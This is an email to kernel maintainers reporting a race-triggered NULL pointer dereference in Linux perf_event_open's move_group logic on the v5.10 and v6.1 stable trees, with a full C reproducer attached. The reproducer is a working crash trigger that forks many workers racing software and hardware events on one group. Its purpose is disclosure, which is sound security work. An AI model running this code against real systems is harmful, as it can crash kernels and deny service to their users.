Hi there,

I found a NULL pointer dereference in the perf subsystem. It affects at least the v5.10 and v6.1 stable trees (the same PoC cannot trigger the crash on mainline).

I have failed to find the root cause of the bug. All I know is that it is a race condition in the logic that moves a group ("move_group") from pure software-based perf events to hardware ones.

More specifically, when we add a hardware perf event to a software event group, it triggers the "move_group" logic in perf_event_open. When the "move_group" logic runs, it first removes all existing events from the context using `perf_remove_from_context`, which in turn invokes `__perf_remove_from_context` through `event_function_call`. Notice that `event_function_call` is defined as follows:

~~~
static void event_function_call(struct perf_event *event, event_f func, void *data)
{
	...
	func(event, NULL, ctx, data);
	...
}
~~~

This means `__perf_remove_from_context` will be invoked with cpuctx == NULL, which leads to invoking `event_sched_out` with cpuctx == NULL. At this point, as long as the event is active, we reach the `if (event->attr.exclusive || !cpuctx->active_oncpu)` check, which is a NULL pointer dereference.

I don't know the proper way to patch this bug, so I'm asking for help. A reproducer is attached to this email.

Best,
Kyle Zeng
#define _GNU_SOURCE
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <assert.h>
#include <linux/perf_event.h>
#include <linux/futex.h>

/*
 * Reproducer for a race in perf_event_open(): one thread keeps adding
 * software sibling events to a software event group while another thread
 * adds a hardware event to the same group.
 */

enum {
	NUM_WORKERS = 16,       /* processes forked by main(), each running loop() */
	NUM_SW_SIBLINGS = 0x20, /* software events func1() adds to the group */
};

/* PID of the process that owns the event group; set by context_setup(). */
int pid;
/* File descriptor of the software group leader; set by context_setup(). */
int group_fd;

/*
 * Create the software (CPU clock) group leader for the calling process on
 * CPU 0 and record its fd in group_fd and the caller's PID in pid.
 *
 * Terminates the process if the event cannot be created, since the racing
 * threads are meaningless without a valid group leader.
 */
void context_setup(void)
{
	struct perf_event_attr attr = {0};

	pid = getpid();

	attr.type = PERF_TYPE_SOFTWARE;
	attr.config = PERF_COUNT_SW_CPU_CLOCK;
	attr.size = sizeof(attr);
	attr.exclude_kernel = 1;

	/* Arguments: attr, pid, cpu = 0, group_fd = -1 (new leader), flags = 0. */
	group_fd = syscall(__NR_perf_event_open, &attr, pid, 0, -1, 0);
	if (group_fd == -1) {
		/* Explicit check rather than assert(): must survive -DNDEBUG. */
		perror("perf_event_open");
		exit(EXIT_FAILURE);
	}
}

/*
 * Thread body: repeatedly add software CPU-clock events to the group led
 * by group_fd.
 *
 * The results of perf_event_open() are deliberately ignored and the new
 * fds are never closed; they go away when the process exits.
 *
 * @param arg  unused
 * @return     always NULL
 */
void *func1(void *arg)
{
	struct perf_event_attr attr = {.size = sizeof(attr)};

	(void)arg;

	attr.type = PERF_TYPE_SOFTWARE;
	attr.config = PERF_COUNT_SW_CPU_CLOCK;
	attr.exclude_kernel = 1;

	for (int i = 0; i < NUM_SW_SIBLINGS; i++) {
		syscall(__NR_perf_event_open, &attr, pid, 0, group_fd, 0);
	}

	return NULL;
}

/*
 * Thread body: add a single hardware CPU-cycles event to the software
 * group led by group_fd. Adding a hardware event to a software group is
 * the operation that races with func1().
 *
 * The result of perf_event_open() is deliberately ignored.
 *
 * @param arg  unused
 * @return     always NULL
 */
void *func2(void *arg)
{
	struct perf_event_attr attr = {.size = sizeof(attr)};

	(void)arg;

	attr.type = PERF_TYPE_HARDWARE;
	attr.config = PERF_COUNT_HW_CPU_CYCLES;
	attr.exclude_kernel = 1;

	syscall(__NR_perf_event_open, &attr, pid, 0, group_fd, 0);

	return NULL;
}

/*
 * Run func1() and func2() concurrently and wait for both to finish.
 * A thread that failed to start is not joined, so pthread_join() is never
 * called on an uninitialised pthread_t.
 */
void execute_two(void)
{
	pthread_t tid1, tid2;
	bool started1 = pthread_create(&tid1, NULL, func1, NULL) == 0;
	bool started2 = pthread_create(&tid2, NULL, func2, NULL) == 0;

	if (started1) {
		pthread_join(tid1, NULL);
	}
	if (started2) {
		pthread_join(tid2, NULL);
	}
}

/*
 * Forever: fork a child that sets up a fresh event group, runs one round
 * of the race and exits; then reap it and start over. Never returns.
 */
static void loop(void)
{
	while (1) {
		pid_t child = fork();

		if (child == 0) {
			context_setup();
			execute_two();
			exit(0);
		}
		if (child < 0) {
			/* Back off instead of spinning on a failing fork(). */
			perror("fork");
			sleep(1);
			continue;
		}
		wait(NULL);
	}
}

/*
 * Fork NUM_WORKERS processes that each run loop() indefinitely, then keep
 * the parent alive while they work.
 */
int main(void)
{
	for (int i = 0; i < NUM_WORKERS; i++) {
		pid_t worker = fork();

		if (worker == 0) {
			loop(); /* never returns */
		}
		if (worker < 0) {
			perror("fork");
		}
	}

	sleep(100000000);
	return 0;
}